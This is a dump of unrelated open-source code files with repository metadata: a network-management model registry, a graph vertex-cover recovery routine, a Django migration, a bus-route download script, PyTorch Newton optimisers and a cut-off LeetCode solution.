"inv.DiscoveryID": "noc.inv.models.discoveryid.DiscoveryID",
"inv.Firmware": "noc.inv.models.firmware.Firmware",
"inv.FirmwarePolicy": "noc.inv.models.firmwarepolicy.FirmwarePolicy",
"inv.ForwardingInstance": "noc.inv.models.forwardinginstance.ForwardingInstance",
"inv.Interface": "noc.inv.models.interface.Interface",
"inv.InterfaceClassificationRule": "noc.inv.models.interfaceclassificationrule.InterfaceClassificationRule",
"inv.InterfaceProfile": "noc.inv.models.interfaceprofile.InterfaceProfile",
"inv.Link": "noc.inv.models.link.Link",
"inv.MACDB": "noc.inv.models.macdb.MACDB",
"inv.MACLog": "noc.inv.models.maclog.MACLog",
"inv.MapSettings": "noc.inv.models.mapsettings.MapSettings",
"inv.ModelConnectionsCache": "noc.inv.models.objectmodel.ModelConnectionsCache",
"inv.ModelInterface": "noc.inv.models.modelinterface.ModelInterface",
"inv.ModelMapping": "noc.inv.models.modelmapping.ModelMapping",
"inv.NetworkSegment": "noc.inv.models.networksegment.NetworkSegment",
"inv.NetworkSegmentProfile": "noc.inv.models.networksegmentprofile.NetworkSegmentProfile",
"inv.NewAddressDiscoveryLog": "noc.inv.models.newaddressdiscoverylog.NewAddressDiscoveryLog",
"inv.NewPrefixDiscoveryLog": "noc.inv.models.newprefixdiscoverylog.NewPrefixDiscoveryLog",
"inv.Object": "noc.inv.models.object.Object",
"inv.ObjectConnection": "noc.inv.models.objectconnection.ObjectConnection",
"inv.ObjectFile": "noc.inv.models.objectfile.ObjectFile",
"inv.ObjectLog": "noc.inv.models.objectlog.ObjectLog",
"inv.ObjectModel": "noc.inv.models.objectmodel.ObjectModel",
"inv.Platform": "noc.inv.models.platform.Platform",
"inv.SubInterface": "noc.inv.models.subinterface.SubInterface",
"inv.Technology": "noc.inv.models.technology.Technology",
"inv.ResourceGroup": "noc.inv.models.resourcegroup.ResourceGroup",
"inv.UnknownModel": "noc.inv.models.unknownmodel.UnknownModel",
"inv.Vendor": "noc.inv.models.vendor.Vendor",
# sa models
"sa.Action": "noc.sa.models.action.Action",
"sa.ActionCommands": "noc.sa.models.actioncommands.ActionCommands",
"sa.AdministrativeDomain": "noc.sa.models.administrativedomain.AdministrativeDomain",
"sa.AuthProfile": "noc.sa.models.authprofile.AuthProfile",
"sa.AuthProfileSuggestSNMP": "noc.sa.models.authprofile.AuthProfileSuggestSNMP",
"sa.AuthProfileSuggestCLI": "noc.sa.models.authprofile.AuthProfileSuggestCLI",
"sa.CapsProfile": "noc.sa.models.capsprofile.CapsProfile",
"sa.CommandSnippet": "noc.sa.models.commandsnippet.CommandSnippet",
"sa.CPEStatus": "noc.sa.models.cpestatus.CPEStatus",
"sa.GroupAccess": "noc.sa.models.groupaccess.GroupAccess",
"sa.InteractionLog": "noc.sa.models.interactionlog.InteractionLog",
"sa.ManagedObject": "noc.sa.models.managedobject.ManagedObject",
"sa.ManagedObjectAttribute": "noc.sa.models.managedobject.ManagedObjectAttribute",
"sa.ManagedObjectProfile": "noc.sa.models.managedobjectprofile.ManagedObjectProfile",
"sa.ManagedObjectSelector": "noc.sa.models.managedobjectselector.ManagedObjectSelector",
"sa.ManagedObjectSelectorByAttribute": "noc.sa.models.managedobjectselector.ManagedObjectSelectorByAttribute",
"sa.ObjectCapabilities": "noc.sa.models.objectcapabilities.ObjectCapabilities",
"sa.ObjectNotification": "noc.sa.models.objectnotification.ObjectNotification",
"sa.ObjectStatus": "noc.sa.models.objectstatus.ObjectStatus",
"sa.Profile": "noc.sa.models.profile.Profile",
"sa.ProfileCheckRule": "noc.sa.models.profilecheckrule.ProfileCheckRule",
"sa.Service": "noc.sa.models.service.Service",
"sa.ServiceProfile": "noc.sa.models.serviceprofile.ServiceProfile",
"sa.ServiceSummary": "noc.sa.models.servicesummary.ServiceSummary",
"sa.UserAccess": "noc.sa.models.useraccess.UserAccess",
# fm models
"fm.ActiveAlarm": "noc.fm.models.activealarm.ActiveAlarm",
"fm.ActiveEvent": "noc.fm.models.activeevent.ActiveEvent",
"fm.AlarmClass": "noc.fm.models.alarmclass.AlarmClass",
"fm.AlarmClassCategory": "noc.fm.models.alarmclasscategory.AlarmClassCategory",
"fm.AlarmClassConfig": "noc.fm.models.alarmclassconfig.AlarmClassConfig",
"fm.AlarmDiagnosticConfig": "noc.fm.models.alarmdiagnosticconfig.AlarmDiagnosticConfig",
"fm.AlarmSeverity": "noc.fm.models.alarmseverity.AlarmSeverity",
"fm.AlarmTrigger": "noc.fm.models.alarmtrigger.AlarmTrigger",
"fm.ArchivedAlarm": "noc.fm.models.archivedalarm.ArchivedAlarm",
"fm.ArchivedEvent": "noc.fm.models.archivedevent.ArchivedEvent",
"fm.CloneClassificationRule": "noc.fm.models.cloneclassificationrule.CloneClassificationRule",
"fm.Enumeration": "noc.fm.models.enumeration.Enumeration",
"fm.EventClass": "noc.fm.models.eventclass.EventClass",
"fm.EventClassCategory": "noc.fm.models.eventclass.EventClassCategory",
"fm.EventClassificationRule": "noc.fm.models.eventclassificationrule.EventClassificationRule",
"fm.EventClassificationRuleCategory": "noc.fm.models.eventclassificationrule.EventClassificationRuleCategory",
"fm.EventTrigger": "noc.fm.models.eventtrigger.EventTrigger",
"fm.FailedEvent": "noc.fm.models.failedevent.FailedEvent",
"fm.IgnoreEventRules": "noc.fm.models.ignoreeventrules.IgnoreEventRules",
"fm.IgnorePattern": "noc.fm.models.ignorepattern.IgnorePattern",
"fm.MIB": "noc.fm.models.mib.MIB",
"fm.MIBAlias": "noc.fm.models.mibalias.MIBAlias",
"fm.MIBData": "noc.fm.models.mibdata.MIBData",
"fm.MIBPreference": "noc.fm.models.mibpreference.MIBPreference",
"fm.OIDAlias": "noc.fm.models.oidalias.OIDAlias",
"fm.Outage": "noc.fm.models.outage.Outage",
"fm.Reboot": "noc.fm.models.reboot.Reboot",
"fm.SyntaxAlias": "noc.fm.models.syntaxalias.SyntaxAlias",
"fm.TTSystem": "noc.fm.models.ttsystem.TTSystem",
"fm.Uptime": "noc.fm.models.uptime.Uptime",
# pm models
"pm.MetricScope": "noc.pm.models.metricscope.MetricScope",
"pm.MetricType": "noc.pm.models.metrictype.MetricType",
"pm.ThresholdProfile": "noc.pm.models.thresholdprofile.ThresholdProfile",
# cm models
"cm.ConfDBQuery": "noc.cm.models.confdbquery.ConfDBQuery",
"cm.ErrorType": "noc.cm.models.errortype.ErrorType",
"cm.InterfaceValidationPolicy": "noc.cm.models.interfacevalidationpolicy.InterfaceValidationPolicy",
"cm.ObjectFact": "noc.cm.models.objectfact.ObjectFact",
"cm.ObjectNotify": "noc.cm.models.objectnotify.ObjectNotify",
"cm.ObjectValidationPolicy": "noc.cm.models.objectvalidationpolicy.ObjectValidationPolicy",
"cm.ValidationPolicy": "noc.cm.models.validationpolicy.ValidationPolicy",
"cm.ValidationPolicySettings": "noc.cm.models.validationpolicysettings.ValidationPolicySettings",
"cm.ValidationRule": "noc.cm.models.validationrule.ValidationRule",
# ip models
"ip.Address": "noc.ip.models.address.Address",
"ip.AddressProfile": "noc.ip.models.addressprofile.AddressProfile",
"ip.AddressRange": "noc.ip.models.addressrange.AddressRange",
"ip.Prefix": "noc.ip.models.prefix.Prefix",
"ip.PrefixAccess": "noc.ip.models.prefixaccess.PrefixAccess",
"ip.PrefixBookmark": "noc.ip.models.prefixbookmark.PrefixBookmark",
"ip.PrefixProfile": "noc.ip.models.prefixprofile.PrefixProfile",
"ip.VRF": "noc.ip.models.vrf.VRF",
"ip.VRFGroup": "noc.ip.models.vrfgroup.VRFGroup",
# vc models
"vc.VC": "noc.vc.models.vc.VC",
"vc.VCBindFilter": "noc.vc.models.vcbindfilter.VCBindFilter",
"vc.VCDomain": "noc.vc.models.vcdomain.VCDomain",
"vc.VCDomainProvisioningConfig": "noc.vc.models.vcdomainprovisioningconfig.VCDomainProvisioningConfig",
"vc.VCFilter": "noc.vc.models.vcfilter.VCFilter",
"vc.VCType": "noc.vc.models.vctype.VCType",
"vc.VLANProfile": "noc.vc.models.vlanprofile.VLANProfile",
"vc.VLAN": "noc.vc.models.vlan.VLAN",
"vc.VPNProfile": "noc.vc.models.vpnprofile.VPNProfile",
"vc.VPN": "noc.vc.models.vpn.VPN",
# dns models
"dns.DNSServer": "noc.dns.models.dnsserver.DNSServer",
"dns.DNSZone": "noc.dns.models.dnszone.DNSZone",
"dns.DNSZoneProfile": "noc.dns.models.dnszoneprofile.DNSZoneProfile",
"dns.DNSZoneRecord": "noc.dns.models.dnszonerecord.DNSZoneRecord",
# peer models
"peer.ASProfile": "noc.peer.models.asprofile.ASProfile",
"peer.AS": "noc.peer.models.asn.AS",
"peer.ASSet": "noc.peer.models.asset.ASSet",
"peer.Community": "noc.peer.models.community.Community",
"peer.CommunityType": "noc.peer.models.communitytype.CommunityType",
"peer.Maintainer": "noc.peer.models.maintainer.Maintainer",
"peer.Organisation": "noc.peer.models.organisation.Organisation",
"peer.Peer": "noc.peer.models.peer.Peer",
"peer.PeerGroup": "noc.peer.models.peergroup.PeerGroup",
"peer.PeeringPoint": "noc.peer.models.peeringpoint.PeeringPoint",
"peer.Person": "noc.peer.models.person.Person",
"peer.PrefixListCache": "noc.peer.models.prefixlistcache.PrefixListCache",
"peer.RIR": "noc.peer.models.rir.RIR",
"peer.WhoisASSetMembers": "noc.peer.models.whoisassetmembers.WhoisASSetMembers",
"peer.WhoisOriginRoute": "noc.peer.models.whoisoriginroute.WhoisOriginRoute",
# kb models
"kb.KBEntry": "noc.kb.models.kbentry.KBEntry",
"kb.KBEntryAttachment": "noc.kb.models.kbentryattachment.KBEntryAttachment",
"kb.KBEntryHistory": "noc.kb.models.kbentryhistory.KBEntryHistory",
"kb.KBEntryPreviewLog": "noc.kb.models.kbentrypreviewlog.KBEntryPreviewLog",
"kb.KBEntryTemplate": "noc.kb.models.kbentrytemplate.KBEntryTemplate",
"kb.KBGlobalBookmark": "noc.kb.models.kbglobalbookmark.KBGlobalBookmark",
"kb.KBUserBookmark": "noc.kb.models.kbuserbookmark.KBUserBookmark",
# Maintenance
"maintenance.Maintenance": "noc.maintenance.models.maintenance.Maintenance",
"maintenance.MaintenanceType": "noc.maintenance.models.maintenancetype.MaintenanceType",
# support models
"support.Crashinfo": "noc.support.models.crashinfo.Crashinfo",
# crm models
"crm.SubscriberProfile": "noc.crm.models.subscriberprofile.SubscriberProfile",
"crm.SupplierProfile": "noc.crm.models.supplierprofile.SupplierProfile",
"crm.Subscriber": "noc.crm.models.subscriber.Subscriber",
"crm.Supplier": "noc.crm.models.supplier.Supplier",
# sla models
"sla.SLAProfile": "noc.sla.models.slaprofile.SLAProfile",
"sla.SLAProbe": "noc.sla.models.slaprobe.SLAProbe",
# bi models
"bi.DashboardLayout": "noc.bi.models.dashboardlayout.DashboardLayout",
# phone models
"phone.DialPlan": "noc.phone.models.dialplan.DialPlan",
"phone.NumberCategory": "noc.phone.models.numbercategory.NumberCategory",
"phone.PhoneNumber": "noc.phone.models.phonenumber.PhoneNumber",
"phone.PhoneNumberProfile": "noc.phone.models.phonenumberprofile.PhoneNumberProfile",
"phone.PhoneRange": "noc.phone.models.phonerange.PhoneRange",
"phone.PhoneRangeProfile": "noc.phone.models.phonerangeprofile.PhoneRangeProfile",
# wf models
"wf.Workflow": "noc.wf.models.workflow.Workflow",
"wf.State": "noc.wf.models.state.State",
"wf.Transition": "noc.wf.models.transition.Transition",
}
FTS_MODELS = ["ip.Address", "ip.Prefix", "ip.VRF", "vc.VC", "sa.ManagedObject"]
COLLECTIONS = [
"fm.SyntaxAlias",
"sa.Profile",
"dev.Quiz",
"dev.Spec",
"sa.Action",
"inv.Capability",
"pm.MetricScope",
"pm.MetricType",
"fm.Enumeration",
"inv.ConnectionRule",
"inv.ConnectionType",
"inv.Vendor",
"inv.Platform",
"inv.Firmware",
"fm.MIBAlias",
"gis.Layer",
"cm.ErrorType",
"fm.OIDAlias",
"inv.Technology",
"fm.MIBPreference",
"inv.ModelInterface",
"fm.AlarmSeverity",
"sa.ActionCommands",
"inv.ObjectModel",
"fm.AlarmClass",
"fm.EventClass",
"fm.EventClassificationRule",
"fm.CloneClassificationRule",
"sa.ProfileCheckRule",
"bi.DashboardLayout",
"cm.ConfDBQuery",
]
| 49.142857
| 114
| 0.712768
|
86686b8c674ae561149c2ef3d92772719be3f215
| 3,698
|
py
|
Python
|
nrpcalc/base/recovery.py
|
TimothyStiles/nrpcalc
|
42ab25e929d472c2e808dd3bec6430bc80b42a06
|
[
"MIT"
] | 6
|
2020-07-27T17:59:19.000Z
|
2022-03-18T03:33:17.000Z
|
nrpcalc/base/recovery.py
|
TimothyStiles/nrpcalc
|
42ab25e929d472c2e808dd3bec6430bc80b42a06
|
[
"MIT"
] | 3
|
2020-07-17T23:10:36.000Z
|
2021-09-10T05:19:47.000Z
|
nrpcalc/base/recovery.py
|
TimothyStiles/nrpcalc
|
42ab25e929d472c2e808dd3bec6430bc80b42a06
|
[
"MIT"
] | 3
|
2020-07-27T17:59:22.000Z
|
2021-02-08T15:47:28.000Z
|
import sys
from . import vercov
import networkx as nx
from itertools import count
from time import time
from math import log10
def is_graph_empty(homology_graph):
if not homology_graph.number_of_nodes():
return True
return False
def get_vercov_func(vercov_func, homology_graph):
# TO DO: NEED TO USE DIFFERENT FUNCTIONS AT DIFFERENT EDGE COUNT SCALES!!
if vercov_func == 'nrpG':
return vercov.nrp_vercov_greedy, 'NRP Greedy'
elif vercov_func == '2apx':
# return vercov.std_vercov_approx, 'Standard 2-approximation'
return vercov.nx_vercov, 'Standard 2-approximation'
else:
return vercov.nrp_vercov_approx, 'NRP 2-approximation'
def dump_homology_graph(homology_graph, graph_file):
nx.write_adjlist(homology_graph, graph_file)
def load_homology_graph(graph_file):
return nx.read_adjlist(graph_file, nodetype=int)
def get_recovered_non_homologs(homology_graph, graph_file, vercov_func=None, verbose=True):
indiset_nodes = set()
# powertex_elimination(homology_graph, verbose)
completex_nodes = [] #completex_elimination(homology_graph, verbose)
# indiset_nodes.update(completex_nodes)
possible_nodes = set(homology_graph.nodes())
if verbose:
print('\n [+] Initial independent set = {}, computing vertex cover on remaining {} nodes.'.format(len(indiset_nodes), len(completex_nodes), len(possible_nodes)))
if is_graph_empty(homology_graph):
if verbose:
print(' [X] Graph is empty, further independent set expansion not possible, terminating.')
else:
vercov_func, vercov_func_name = get_vercov_func(vercov_func, homology_graph)
iteration = -1
if verbose:
print(' [+] Vertex Cover Function: {}'.format(vercov_func_name))
sys.stdout.write(' [+] Dumping graph into: {}'.format(graph_file))
t0 = time()
dump_homology_graph(homology_graph, graph_file)
if verbose:
sys.stdout.write(' in {} seconds\n'.format(time()-t0))
while True:
iteration += 1
if verbose:
print('\n----------------------')
print('Now running iteration: {}'.format(iteration))
print('----------------------')
t0 = time()
if iteration > 0:
homology_graph = nx.Graph(homology_graph.subgraph(possible_nodes))
vercov_nodes = vercov_func(homology_graph, verbose)
if verbose:
print('\n [+] Computed vertex cover of size: {} (in {:.4} seconds)'.format(len(vercov_nodes), time()-t0))
print(' [+] Loading graph from: {}'.format(graph_file))
homology_graph = load_homology_graph(graph_file)
new_indiset_nodes = possible_nodes - vercov_nodes
indiset_nodes |= new_indiset_nodes
possible_nodes = vercov_nodes
prev_possibility_count = len(possible_nodes)
for indi_node in new_indiset_nodes:
possible_nodes.difference_update(homology_graph[indi_node])
curr_possibility_count = len(possible_nodes)
if verbose:
print(' [+] Current independent set size: {}'.format(len(indiset_nodes)))
print(' [+] Potential nodes for expansion: {} (projected independent set size: {})'.format(len(possible_nodes), len(indiset_nodes)+len(possible_nodes)))
if len(possible_nodes) == 0 or prev_possibility_count == curr_possibility_count:
if verbose:
print(' [X] Cannot expand independent set, terminating.')
break
return indiset_nodes
| 38.123711
| 169
| 0.642509
|
4a799428ea828ce7c8dea582838fee65f81ae2d1
| 1,185
|
py
|
Python
|
pridesport_work/gears/migrations/0001_initial.py
|
Trifon87/pridesport_work
|
9ab47d3c58915c2e791bf8a1fcb3ceee1d8de62c
|
[
"MIT"
] | null | null | null |
pridesport_work/gears/migrations/0001_initial.py
|
Trifon87/pridesport_work
|
9ab47d3c58915c2e791bf8a1fcb3ceee1d8de62c
|
[
"MIT"
] | null | null | null |
pridesport_work/gears/migrations/0001_initial.py
|
Trifon87/pridesport_work
|
9ab47d3c58915c2e791bf8a1fcb3ceee1d8de62c
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.3 on 2020-11-12 22:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Gear',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(choices=[('fight', 'fight'), ('fitness', 'fitness'), ('clothing', 'clothing'), ('unknown', 'Unknown')], default='unknown', max_length=35)),
('name', models.CharField(max_length=35)),
('price', models.FloatField()),
('description', models.TextField(blank=True)),
('image_url', models.URLField()),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gear', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='gears.gear')),
],
),
]
| 34.852941
| 181
| 0.564557
|
6e366a2baca79ba6bf16ad8e7d157bbee126e0d2
| 1,206
|
py
|
Python
|
script/update-bus-routes.py
|
khanhhua/erlbot
|
4de8656449380d709d8ff44bb2261ab43010bcf3
|
[
"BSD-3-Clause"
] | 6
|
2017-11-29T12:18:21.000Z
|
2022-03-18T14:00:19.000Z
|
script/update-bus-routes.py
|
khanhhua/erlbot
|
4de8656449380d709d8ff44bb2261ab43010bcf3
|
[
"BSD-3-Clause"
] | 4
|
2017-11-13T05:51:00.000Z
|
2017-12-05T09:50:02.000Z
|
script/update-bus-routes.py
|
khanhhua/erlbot
|
4de8656449380d709d8ff44bb2261ab43010bcf3
|
[
"BSD-3-Clause"
] | 1
|
2021-11-10T22:42:46.000Z
|
2021-11-10T22:42:46.000Z
|
import json
import urllib
from urlparse import urlparse
import httplib2 as http #External library if __name__=="__main__":
#Authentication parameters
headers = {
'AccountKey' : os.environ['ACCOUNT_KEY'],
'accept' : 'application/json'
} #this is by default
with open("bus_routes-20171020.csv","w+") as outfile:
#API parameters
skip = 0
print 'Downloading bus routes...'
while True:
print 'Page %d\n' % (skip / 500 + 1)
uri = 'http://datamall2.mytransport.sg/' #Resource URL
path = '/ltaodataservice/BusRoutes?$skip=%d' % skip
target = urlparse(uri + path)
print target.geturl()
method = 'GET'
body = ''
#Get handle to http
h = http.Http()
#Obtain results
response, content = h.request(
target.geturl(),
method,
body,
headers)
#Parse JSON to print
jsonObj = json.loads(content)
#Saving jsonObj["d"]
if len(jsonObj['value']) == 0:
break
for obj in jsonObj['value']:
outfile.write("{BusStopCode}\t{ServiceNo}\t{Direction}\t{StopSequence}\n".format(**obj))
skip += 500
| 27.409091
| 100
| 0.575456
|
698b63067b837a24e2c8f62f0888f7830aca4142
| 13,859
|
py
|
Python
|
torchmin/newton.py
|
dhjpolymath/pytorch-minimize
|
cabe819c97c707fd9f3dc31f50c4520d9c39dfc5
|
[
"MIT"
] | null | null | null |
torchmin/newton.py
|
dhjpolymath/pytorch-minimize
|
cabe819c97c707fd9f3dc31f50c4520d9c39dfc5
|
[
"MIT"
] | null | null | null |
torchmin/newton.py
|
dhjpolymath/pytorch-minimize
|
cabe819c97c707fd9f3dc31f50c4520d9c39dfc5
|
[
"MIT"
] | null | null | null |
from scipy.optimize import OptimizeResult
from scipy.optimize.optimize import _status_message
from scipy.sparse.linalg import eigsh
from torch import Tensor
import torch
from .function import ScalarFunction
from .line_search import strong_wolfe
_status_message['cg_warn'] = "Warning: CG iterations didn't converge. The " \
"Hessian is not positive definite."
def _cg_iters(grad, hess, max_iter, normp=1):
"""A CG solver specialized for the NewtonCG sub-problem.
Derived from Algorithm 7.1 of "Numerical Optimization (2nd Ed.)"
(Nocedal & Wright, 2006; pp. 169)
"""
# Get the most efficient dot product method for this problem
if grad.dim() == 1:
# standard dot product
dot = torch.dot
elif grad.dim() == 2:
# batched dot product
dot = lambda u,v: torch.bmm(u.unsqueeze(1), v.unsqueeze(2)).view(-1,1)
else:
# generalized dot product that supports batch inputs
dot = lambda u,v: u.mul(v).sum(-1, keepdim=True)
g_norm = grad.norm(p=normp)
tol = g_norm * g_norm.sqrt().clamp(0, 0.5)
eps = torch.finfo(grad.dtype).eps
n_iter = 0 # TODO: remove?
maxiter_reached = False
# initialize state and iterate
x = torch.zeros_like(grad)
r = grad.clone()
p = grad.neg()
rs = dot(r, r)
for n_iter in range(max_iter):
if r.norm(p=normp) < tol:
break
Bp = hess.mv(p)
curv = dot(p, Bp)
curv_sum = curv.sum()
if curv_sum < 0:
# hessian is not positive-definite
if n_iter == 0:
# if first step, fall back to steepest descent direction
# (scaled by Rayleigh quotient)
x = grad.mul(rs / curv)
#x = grad.neg()
break
elif curv_sum <= 3 * eps:
break
alpha = rs / curv
x.addcmul_(alpha, p)
r.addcmul_(alpha, Bp)
rs_new = dot(r, r)
p.mul_(rs_new / rs).sub_(r)
rs = rs_new
else:
# curvature keeps increasing; bail
maxiter_reached = True
return x, n_iter, maxiter_reached
@torch.no_grad()
def _minimize_newton_cg(
fun, x0, lr=1., max_iter=None, cg_max_iter=None,
twice_diffable=True, line_search='strong-wolfe', xtol=1e-16,
normp=1, callback=None, disp=0, return_all=False):
"""Minimize a scalar function of one or more variables using the
Newton-Raphson method, with Conjugate Gradient for the linear inverse
sub-problem.
Parameters
----------
fun : callable
Scalar objective function to minimize.
x0 : Tensor
Initialization point.
lr : float
Step size for parameter updates. If using line search, this will be
used as the initial step size for the search.
max_iter : int, optional
Maximum number of iterations to perform. Defaults to
``200 * x0.numel()``.
cg_max_iter : int, optional
Maximum number of iterations for CG subproblem. Recommended to
leave this at the default of ``20 * x0.numel()``.
twice_diffable : bool
Whether to assume the function is twice continuously differentiable.
If True, hessian-vector products will be much faster.
line_search : str
Line search specifier. Currently the available options are
{'none', 'strong_wolfe'}.
xtol : float
Average relative error in solution `xopt` acceptable for
convergence.
normp : Number or str
The norm type to use for termination conditions. Can be any value
supported by :func:`torch.norm`.
callback : callable, optional
Function to call after each iteration with the current parameter
state, e.g. ``callback(x)``.
disp : int or bool
Display (verbosity) level. Set to >0 to print status messages.
return_all : bool
Set to True to return a list of the best solution at each of the
iterations.
Returns
-------
result : OptimizeResult
Result of the optimization routine.
"""
lr = float(lr)
disp = int(disp)
xtol = x0.numel() * xtol
if max_iter is None:
max_iter = x0.numel() * 200
if cg_max_iter is None:
cg_max_iter = x0.numel() * 20
# construct scalar objective function
sf = ScalarFunction(fun, x0.shape, hessp=True, twice_diffable=twice_diffable)
closure = sf.closure
if line_search == 'strong-wolfe':
dir_evaluate = sf.dir_evaluate
# initial settings
x = x0.detach().clone(memory_format=torch.contiguous_format)
f, g, hessp, _ = closure(x)
if disp > 1:
print('initial fval: %0.4f' % f)
if return_all:
allvecs = [x]
ncg = 0 # number of cg iterations
n_iter = 0
# begin optimization loop
for n_iter in range(1, max_iter + 1):
# ============================================================
# Compute a search direction pk by applying the CG method to
# H_f(xk) p = - J_f(xk) starting from 0.
# ============================================================
# Compute search direction with conjugate gradient (GG)
d, cg_iters, cg_fail = _cg_iters(g, hessp, cg_max_iter, normp)
ncg += cg_iters
if cg_fail:
warnflag = 3
msg = _status_message['cg_warn']
break
# =====================================================
# Perform variable update (with optional line search)
# =====================================================
if line_search == 'none':
update = d.mul(lr)
x = x + update
elif line_search == 'strong-wolfe':
# strong-wolfe line search
_, _, t, ls_nevals = strong_wolfe(dir_evaluate, x, lr, d, f, g)
update = d.mul(t)
x = x + update
else:
raise ValueError('invalid line_search option {}.'.format(line_search))
# re-evaluate function
f, g, hessp, _ = closure(x)
if disp > 1:
print('iter %3d - fval: %0.4f' % (n_iter, f))
if callback is not None:
callback(x)
if return_all:
allvecs.append(x)
# ==========================
# check for convergence
# ==========================
if update.norm(p=normp) <= xtol:
warnflag = 0
msg = _status_message['success']
break
if not f.isfinite():
warnflag = 3
msg = _status_message['nan']
break
else:
# if we get to the end, the maximum num. iterations was reached
warnflag = 1
msg = _status_message['maxiter']
if disp:
print(msg)
print(" Current function value: %f" % f)
print(" Iterations: %d" % n_iter)
print(" Function evaluations: %d" % sf.nfev)
print(" CG iterations: %d" % ncg)
result = OptimizeResult(fun=f, x=x.view_as(x0), grad=g.view_as(x0),
status=warnflag, success=(warnflag==0),
message=msg, nit=n_iter, nfev=sf.nfev, ncg=ncg)
if return_all:
result['allvecs'] = allvecs
return result
@torch.no_grad()
def _minimize_newton_exact(
fun, x0, lr=1., max_iter=None, line_search='strong-wolfe', xtol=1e-16,
normp=1, tikhonov=0., handle_npd='grad', callback=None, disp=0,
return_all=False):
"""Minimize a scalar function of one or more variables using the
Newton-Raphson method.
This variant uses an "exact" Newton routine based on Cholesky factorization
of the explicit Hessian matrix.
Parameters
----------
fun : callable
Scalar objective function to minimize.
x0 : Tensor
Initialization point.
lr : float
Step size for parameter updates. If using line search, this will be
used as the initial step size for the search.
max_iter : int, optional
Maximum number of iterations to perform. Defaults to
``200 * x0.numel()``.
line_search : str
Line search specifier. Currently the available options are
{'none', 'strong_wolfe'}.
xtol : float
Average relative error in solution `xopt` acceptable for
convergence.
normp : Number or str
The norm type to use for termination conditions. Can be any value
supported by :func:`torch.norm`.
tikhonov : float
Optional diagonal regularization (Tikhonov) parameter for the Hessian.
handle_npd : str
Mode for handling non-positive definite hessian matrices. Can be one
of the following:
* 'grad' : use steepest descent direction (gradient)
* 'lu' : solve the inverse hessian with LU factorization
* 'eig' : use symmetric eigendecomposition to determine a
diagonal regularization parameter
callback : callable, optional
Function to call after each iteration with the current parameter
state, e.g. ``callback(x)``.
disp : int or bool
Display (verbosity) level. Set to >0 to print status messages.
return_all : bool
Set to True to return a list of the best solution at each of the
iterations.
Returns
-------
result : OptimizeResult
Result of the optimization routine.
"""
lr = float(lr)
disp = int(disp)
xtol = x0.numel() * xtol
if max_iter is None:
max_iter = x0.numel() * 200
# Construct scalar objective function
sf = ScalarFunction(fun, x0.shape, hess=True)
closure = sf.closure
if line_search == 'strong-wolfe':
dir_evaluate = sf.dir_evaluate
# initial settings
x = x0.detach().view(-1).clone(memory_format=torch.contiguous_format)
f, g, _, hess = closure(x)
if tikhonov > 0:
hess.diagonal().add_(tikhonov)
if disp > 1:
print('initial fval: %0.4f' % f)
if return_all:
allvecs = [x]
nfail = 0
n_iter = 0
# begin optimization loop
for n_iter in range(1, max_iter + 1):
# ==================================================
# Compute a search direction d by solving
# H_f(x) d = - J_f(x)
# with the true Hessian and Cholesky factorization
# ===================================================
# Compute search direction with Cholesky solve
L, info = torch.linalg.cholesky_ex(hess)
if info == 0:
d = torch.cholesky_solve(g.neg().unsqueeze(1), L).squeeze(1)
else:
nfail += 1
if handle_npd == 'lu':
d = torch.linalg.solve(hess, g.neg())
elif handle_npd == 'grad':
d = g.neg()
elif handle_npd == 'cauchy':
gnorm = g.norm(p=2)
scale = 1 / gnorm
gHg = g.dot(hess.mv(g))
if gHg > 0:
scale *= torch.clamp_max_(gnorm.pow(3) / gHg, max=1)
d = scale * g.neg()
elif handle_npd == 'eig':
# this setting is experimental! use with caution
# TODO: why chose the factor 1.5 here? Seems to work best
eig0 = eigsh(hess.cpu().numpy(), k=1, which="SA", tol=1e-4,
return_eigenvectors=False).item()
tau = max(1e-3 - 1.5 * eig0, 0)
hess.diagonal().add_(tau)
d = torch.cholesky_solve(g.neg().unsqueeze(1),
torch.linalg.cholesky(hess)).squeeze(1)
else:
raise RuntimeError('invalid handle_npd encountered.')
# =====================================================
# Perform variable update (with optional line search)
# =====================================================
if line_search == 'none':
update = d.mul(lr)
x = x + update
elif line_search == 'strong-wolfe':
# strong-wolfe line search
_, _, t, ls_nevals = strong_wolfe(dir_evaluate, x, lr, d, f, g)
update = d.mul(t)
x = x + update
else:
raise ValueError('invalid line_search option {}.'.format(line_search))
# ===================================
# Re-evaluate func/Jacobian/Hessian
# ===================================
f, g, _, hess = closure(x)
if tikhonov > 0:
hess.diagonal().add_(tikhonov)
if disp > 1:
print('iter %3d - fval: %0.4f - info: %d' % (n_iter, f, info))
if callback is not None:
callback(x)
if return_all:
allvecs.append(x)
# ==========================
# check for convergence
# ==========================
if update.norm(p=normp) <= xtol:
warnflag = 0
msg = _status_message['success']
break
if not f.isfinite():
warnflag = 3
msg = _status_message['nan']
break
else:
# if we get to the end, the maximum num. iterations was reached
warnflag = 1
msg = _status_message['maxiter']
if disp:
print(msg)
print(" Current function value: %f" % f)
print(" Iterations: %d" % n_iter)
print(" Function evaluations: %d" % sf.nfev)
result = OptimizeResult(fun=f, x=x.view_as(x0), grad=g.view_as(x0),
hess=hess.view(*x0.shape, *x0.shape),
status=warnflag, success=(warnflag==0),
message=msg, nit=n_iter, nfev=sf.nfev, nfail=nfail)
if return_all:
result['allvecs'] = allvecs
return result
| 34.475124
| 82
| 0.544484
|
b7e9b2790a35f45f900adc2f88d72bc893f47284
| 343
|
py
|
Python
|
Leetcode/0377. Combination Sum IV/0377.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/0377. Combination Sum IV/0377.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
Leetcode/0377. Combination Sum IV/0377.py
|
Next-Gen-UI/Code-Dynamics
|
a9b9d5e3f27e870b3e030c75a1060d88292de01c
|
[
"MIT"
] | null | null | null |
class Solution:
def combinationSum4(self, nums: List[int], target: int) -> int:
dp = [1] + [-1] * target
def dfs(target: int) -> int:
